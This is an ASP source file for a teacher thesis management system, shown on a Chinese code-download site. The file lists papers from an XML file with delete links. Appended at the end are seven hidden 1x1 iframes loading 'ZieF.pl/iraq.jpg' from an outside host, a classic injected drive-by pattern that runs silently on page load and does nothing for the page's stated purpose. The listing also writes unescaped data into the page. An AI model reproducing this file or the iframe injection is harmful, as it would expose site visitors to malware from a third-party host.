⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 gbmanage.asp

📁 教师论文管理系统 主要是完成注册登陆身份验证以及上传教师论文上传等
💻 ASP
字号:
<html>
<head>
<title>添加论文</title>
<style>
td{font-size:12px}body {
	background-repeat: no-repeat;
	background-image: url(img/GB.jpg);
}
#Layer1 {
	position:absolute;
	left:405px;
	top:137px;
	width:417px;
	height:24px;
	z-index:1;
}
.STYLE4 {font-size: 14px; font-weight: bold; color: #999900; }
.STYLE6 {font-size: 24px}
.STYLE8 {
	color: #990033;
	font-weight: bold;
	font-family: Geneva, Arial, Helvetica, sans-serif;
}
body,td,th {
	font-size: 14px;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
<body >

<div id="Layer1"><a href="GBList.asp" class="STYLE4">[论文列表]</a><span class="STYLE1"><a href="GBAppend.htm" class="STYLE4">[添加论文]</a></span><span class="STYLE1"><a href="select1.asp" class="STYLE4">[作者查询]</a></span><span class="STYLE4"><a href="select2.asp">[标题查询]</a></span><a href="select3.asp"><span class="STYLE4">[关键字查询]</span> </a></div>
<table width="950" border="0" cellpadding="0" cellspacing="0" >
  <!--DWLayoutTable-->
  <tr>
    <td width="135" height="158">&nbsp;</td>
    <td width="238">&nbsp;</td>
    <td width="212">&nbsp;</td>
    <td width="230">&nbsp;</td>
    <td width="135">&nbsp;</td>
  </tr>
  <tr>
    <td height="39">&nbsp;</td>
    <td>&nbsp;</td>
    <td valign="top"><span class="STYLE6"><span class="STYLE8">  删 除 论 文</span></span></td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td height="308">&nbsp;</td>
    <td colspan="3" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0">
      <!--DWLayoutTable-->
      <tr>
        <td width="680" height="308"><table border="0" align="center" CELLPADDING="5">
 <thead>
   <th>标题</th>
   <th>作者</th>
    <th>刊名</th>
  </thead>
<%
  set xmldoc=server.createObject("MSXML.DOMDocument")
  xmldoc.async="false"
  xmldoc.load(server.mappath("lw.xml"))
  set nodes=xmldoc.documentElement.childNodes
  k=1
  for i=0 to nodes.length-1  step +1
     if k mod 2=0 then
	  row="<tr bgcolor=#eeeeee>"
	  else
	  row="<tr bgcolor=#d0d0ef>"
	  end if
	  str1=nodes(i).childNodes(0).text
	  str2=nodes(i).childNodes(1).text
	  for j=0 to nodes(i).childNodes.length -1
	if nodes(i).childNodes(j).nodeName = "kanming" then
      str3=nodes(i).childNodes(j).text
  end if
	  next
	  row=row&"<td><a href='GBView.asp?id="&i&"'>"
	  row=row&str1&"</a></td>"
	  row=row&"<td>"&str2&"</td>"
	  row=row&"<td>"&str3&"</td>"
	  row=row&"<td><a href='GBDelete.asp?id="&i&"'>"
	  row=row&"删除</a></td>"
	  response.write row&"</tr>"
	  k=k+1
	  next
	  set xmldoc=nothing
	  %>
  </table>&nbsp;</td>
        </tr>
    </table></td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td height="81">&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
</table>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
</body>
</body>
</html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -